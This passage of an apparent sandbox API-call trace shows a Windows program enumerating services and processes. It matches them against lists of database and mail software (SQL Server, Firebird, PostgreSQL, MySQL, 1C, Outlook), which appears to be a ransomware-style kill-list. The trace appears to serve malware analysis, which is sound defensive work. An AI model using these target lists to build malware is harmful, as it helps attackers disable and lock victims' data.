(lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0052.946] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0052.946] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0052.947] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0052.948] lstrlenW (lpString="LanmanWorkstation") returned 17 [0052.949] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0052.949] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0052.950] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0052.950] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0052.951] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0052.951] lstrlenW (lpString="lmhosts") returned 7 [0052.952] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0052.953] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0052.953] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0052.954] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0052.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0052.956] lstrlenW (lpString="MMCSS") returned 5 [0052.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0052.957] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0052.958] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0052.958] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0052.958] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0052.958] lstrlenW (lpString="MpsSvc") returned 6 [0052.958] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0052.958] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0052.958] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0052.959] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0052.959] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0052.959] lstrlenW (lpString="Netman") returned 6 [0052.959] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0052.959] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0052.959] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0052.959] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0052.959] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0052.959] lstrlenW (lpString="netprofm") returned 8 [0052.959] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0052.959] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0052.959] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0052.959] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0052.959] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0052.959] lstrlenW (lpString="NlaSvc") returned 6 [0052.959] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0052.959] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0052.959] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0052.959] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0052.959] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0052.959] lstrlenW (lpString="nsi") returned 3 [0052.959] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0052.959] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0052.959] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0052.959] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0052.959] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0052.959] lstrlenW (lpString="PcaSvc") returned 6 [0052.959] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0052.959] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0052.959] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0052.959] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0052.959] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0052.960] lstrlenW (lpString="PlugPlay") returned 8 [0052.960] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0052.960] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0052.960] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0052.960] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0052.960] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0052.960] lstrlenW (lpString="Power") returned 5 [0052.960] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0052.960] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0052.960] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0052.960] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0052.960] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0052.960] lstrlenW (lpString="ProfSvc") returned 7 [0052.960] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0052.960] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0052.960] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0052.960] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0052.960] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0052.960] lstrlenW (lpString="RpcEptMapper") returned 12 [0052.960] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0052.960] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0052.960] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0052.961] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0052.961] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0052.962] lstrlenW (lpString="RpcSs") returned 5 [0052.963] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0052.964] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0052.964] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0052.965] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0052.966] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0052.967] lstrlenW (lpString="SamSs") returned 5 [0052.967] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0052.968] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0052.969] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0052.969] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0052.969] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0052.970] lstrlenW (lpString="Schedule") returned 8 [0052.970] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0052.971] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0052.972] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0052.973] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0052.974] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0052.975] lstrlenW (lpString="SENS") returned 4 [0052.976] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0052.977] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0052.978] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0052.978] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0052.978] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0052.979] lstrlenW (lpString="ShellHWDetection") returned 16 [0052.979] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0052.980] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0052.980] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0052.981] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0052.981] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0052.982] lstrlenW (lpString="Spooler") returned 7 [0052.986] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0052.987] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0052.987] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0052.987] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0052.988] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0052.988] lstrlenW (lpString="swprv") returned 5 [0052.989] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0052.990] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0052.990] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0052.992] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0052.993] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0052.994] lstrlenW (lpString="SysMain") returned 7 [0052.995] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0052.995] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0052.996] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0052.997] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0052.997] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0052.998] lstrlenW (lpString="Themes") returned 6 [0052.999] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0053.000] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0053.000] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0053.001] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0053.002] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0053.003] lstrlenW (lpString="TrkWks") returned 6 [0053.003] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0053.004] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0053.005] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0053.005] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0053.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0053.008] lstrlenW (lpString="UxSms") returned 5 [0053.008] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0053.009] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0053.009] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0053.010] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0053.010] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0053.010] lstrlenW (lpString="VSS") returned 3 [0053.010] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0053.010] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0053.011] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0053.011] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0053.011] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0053.011] lstrlenW (lpString="WdiServiceHost") returned 14 [0053.011] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0053.011] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0053.011] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0053.011] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0053.011] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0053.011] lstrlenW (lpString="WdiSystemHost") returned 13 [0053.011] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0053.011] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0053.011] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0053.011] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0053.011] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0053.011] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0053.011] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0053.011] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0053.011] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0053.011] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0053.011] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0053.011] lstrlenW (lpString="Winmgmt") returned 7 [0053.011] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0053.011] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0053.011] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0053.011] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0053.011] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0053.011] lstrlenW (lpString="WPDBusEnum") returned 10 [0053.011] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0053.011] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0053.011] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0053.012] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0053.012] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0053.012] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6e39b0 | out: hHeap=0x5f0000) returned 1 [0053.012] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d8 [0053.477] Process32FirstW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0053.478] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0053.478] lstrlenW (lpString="System") returned 6 [0053.478] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0053.479] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0053.479] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0053.479] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0053.479] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0053.479] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0053.479] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0053.479] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0053.479] lstrlenW (lpString="smss.exe") returned 8 [0053.479] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0053.479] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0053.479] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0053.479] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0053.480] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0053.480] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0053.480] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0053.480] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0053.480] lstrlenW (lpString="csrss.exe") returned 9 [0053.480] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0053.480] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0053.480] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0053.480] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0053.480] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0053.480] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0053.480] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0053.480] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0053.481] lstrlenW (lpString="wininit.exe") returned 11 [0053.481] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0053.481] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0053.481] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0053.481] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0053.482] lstrlenW (lpString="csrss.exe") returned 9 [0053.482] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0053.483] lstrlenW (lpString="winlogon.exe") returned 12 [0053.483] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0053.483] lstrlenW (lpString="services.exe") returned 12 [0053.483] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0053.484] lstrlenW (lpString="lsass.exe") returned 9 [0053.484] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0053.485] lstrlenW (lpString="lsm.exe") returned 7 [0053.485] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.485] lstrlenW (lpString="svchost.exe") returned 11 [0053.485] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.486] lstrlenW (lpString="svchost.exe") returned 11 [0053.486] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.487] lstrlenW (lpString="svchost.exe") returned 11 [0053.487] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.487] lstrlenW (lpString="svchost.exe") returned 11 [0053.487] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.488] lstrlenW (lpString="svchost.exe") returned 11 [0053.488] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0053.489] lstrlenW (lpString="audiodg.exe") returned 11 [0053.489] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.489] lstrlenW (lpString="svchost.exe") returned 11 [0053.489] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.490] lstrlenW (lpString="svchost.exe") returned 11 [0053.490] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0053.491] lstrlenW (lpString="dwm.exe") returned 7 [0053.491] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0053.492] lstrlenW (lpString="explorer.exe") returned 12 [0053.492] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0053.492] lstrlenW (lpString="spoolsv.exe") returned 11 [0053.492] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0053.493] lstrlenW (lpString="taskhost.exe") returned 12 [0053.493] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.494] lstrlenW (lpString="svchost.exe") returned 11 [0053.494] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0053.494] lstrlenW (lpString="taskeng.exe") returned 11 [0053.494] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0053.495] lstrlenW (lpString="taskhost.exe") returned 12 [0053.495] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="entrepreneur.exe")) returned 1 [0053.496] lstrlenW (lpString="entrepreneur.exe") returned 16 [0053.496] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="andrew kinds.exe")) returned 1 [0053.496] lstrlenW (lpString="andrew kinds.exe") returned 16 [0053.496] Process32NextW (in: 